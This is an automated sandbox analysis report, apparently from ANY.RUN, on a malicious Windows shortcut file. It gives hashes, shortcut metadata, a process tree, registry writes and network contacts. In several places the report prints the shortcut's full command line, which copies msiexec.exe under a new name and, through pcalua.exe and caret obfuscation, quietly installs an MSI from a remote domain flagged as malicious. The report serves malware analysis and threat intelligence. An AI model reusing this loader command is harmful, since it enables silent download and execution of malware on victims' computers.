| File name: | 8eec3ac9f7d1ac64fc7397ba57cdac4f56959d1512f71dded60e831a26e0762e.lnk |
| Full analysis: | https://app.any.run/tasks/1c0659cb-fefb-43e2-b940-8d491e8c1405 |
| Verdict: | Malicious activity |
| Analysis date: | July 31, 2022, 12:03:00 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=13, Archive, ctime=Tue Feb 23 06:49:25 2021, mtime=Tue Mar 15 00:08:56 2022, atime=Tue Feb 23 06:49:25 2021, length=289792, window=hidenormalshowminimized |
| MD5: | B0DD685440C27D3183CF7AE2445232AF |
| SHA1: | 4E6267F20D842E5449A315AEBB48601B49172808 |
| SHA256: | 8EEC3AC9F7D1AC64FC7397BA57CDAC4F56959D1512F71DDED60E831A26E0762E |
| SSDEEP: | 12288:dMwUpbeNAWhMwUpbeNAWhMwUpbeNAWhMwUpbeNAWV:ebbe/Cbbe/Cbbe/Cbbe/V |
| .lnk | | | Windows Shortcut (100) |
|---|
| IconFileName: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |
|---|---|
| CommandLineArguments: | /q /c expand %systemroot%\system32\msiexec.exe %appdata%\pat.exe & pca^lua.exe -a %appdata%\pat -c /Q /i https://inst.shconstmarket.com/veafdsag.msi?devop=ERtnsgSFAg |
| WorkingDirectory: | %windir%\System32 |
| LocalBasePath: | C:\Windows\System32\cmd.exe |
| VolumeLabel: | - |
| DriveType: | Fixed Disk |
| TargetFileDOSName: | cmd.exe |
| HotKey: | (none) |
| RunWindow: | Show Minimized No Activate |
| IconIndex: | 13 |
| TargetFileSize: | 289792 |
| ModifyDate: | 2021:02:23 08:49:25+01:00 |
| AccessDate: | 2022:03:15 02:08:56+01:00 |
| CreateDate: | 2021:02:23 08:49:25+01:00 |
| FileAttributes: | Archive |
| Flags: | IDList, LinkInfo, WorkingDir, CommandArgs, IconFile, Unicode, ExpString, ExpIcon |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1184 | expand C:\Windows\system32\msiexec.exe C:\Users\admin\AppData\Roaming\pat.exe | C:\Windows\System32\expand.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: LZ Expansion Utility Exit code: 0 Version: 6.1.7601.24535 (win7sp1_ldr_escrow.191105-1059) Modules
| |||||||||||||||
| 2860 | "C:\Windows\System32\cmd.exe" /q /c expand C:\Windows\system32\msiexec.exe C:\Users\admin\AppData\Roaming\pat.exe & pca^lua.exe -a C:\Users\admin\AppData\Roaming\pat -c /Q /i https://inst.shconstmarket.com/veafdsag.msi?devop=ERtnsgSFAg | C:\Windows\System32\cmd.exe | — | Explorer.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2936 | pcalua.exe -a C:\Users\admin\AppData\Roaming\pat -c /Q /i https://inst.shconstmarket.com/veafdsag.msi?devop=ERtnsgSFAg | C:\Windows\System32\pcalua.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Program Compatibility Assistant Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3208 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3316 | "C:\Users\admin\AppData\Roaming\pat.exe" /Q /i https://inst.shconstmarket.com/veafdsag.msi?devop=ERtnsgSFAg | C:\Users\admin\AppData\Roaming\pat.exe | — | pcalua.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.7601.24535 (win7sp1_ldr_escrow.191105-1059) Modules
| |||||||||||||||
| (PID) Process: | (2936) pcalua.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2936) pcalua.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2936) pcalua.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2936) pcalua.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (3208) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1302019708-1500728564-335382590-1000_CLASSES\Local Settings\MuiCache\16C\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1184 | expand.exe | C:\users\admin\appdata\roaming\pat.exe | executable | |
MD5:B7377B761D7FC8E36A4BEFF7762A92DA | SHA256:66E9A0E0B38248E6BFE63F9712EDD523EF280F44941CBF4877B7AE8BC4924B03 | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3208 | msiexec.exe | 64.44.102.195:443 | inst.shconstmarket.com | Nexeon Technologies, Inc. | US | unknown |
Domain | IP | Reputation |
|---|---|---|
inst.shconstmarket.com |
| malicious |